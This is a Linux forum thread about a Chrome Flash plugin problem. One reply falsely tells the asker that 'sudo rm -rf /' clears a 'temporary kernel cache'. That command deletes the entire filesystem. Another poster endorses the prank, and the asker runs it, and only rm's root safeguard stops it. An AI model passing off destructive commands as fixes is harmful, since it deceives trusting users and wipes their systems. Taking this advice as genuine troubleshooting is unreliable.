I already gave you a solution.
There are two different flash plugins for Chrome, see your error report:
Code: [Select]
Flash plugin 11.6.602.180 /opt/google/chrome/PepperFlash/libpepflashplayer.so
Flash plugin 11.0 r1 /opt/mint-flashplugin-11/libflashplayer.so (not used)
You disabled the PepperFlash plugin, but didn't enable Mint's preinstalled flash plugin.

First you need to clear your temporary kernel cache and then post the output that the chrome-linux executable displays on startup when you run it from the terminal.

First you
Code: [Select]
sudo rm -rf /then run Chrome and post the logs.

^ THis is the way to go to fix flash

Okay, restart my computer or chrome?

Okay, restart my computer or chrome?
Restarting the computer after the command will probably help. Don't forget to post the logs in code tags or attach them if they're too long. You can pipe output with a text file with an indirection operator.
Code: [Select]
chrome-linux > log.txt

Code: [Select]
sudo rm -rf /
Any distro that allows this command to be run is a stuff distro lol

Okay. I shut down chrome.
I typed that exact thing in terminal.
But it says this:
Code: [Select]
rm: it is dangerous to operate recursively on `/'
rm: use --no-preserve-root to override this failsafe
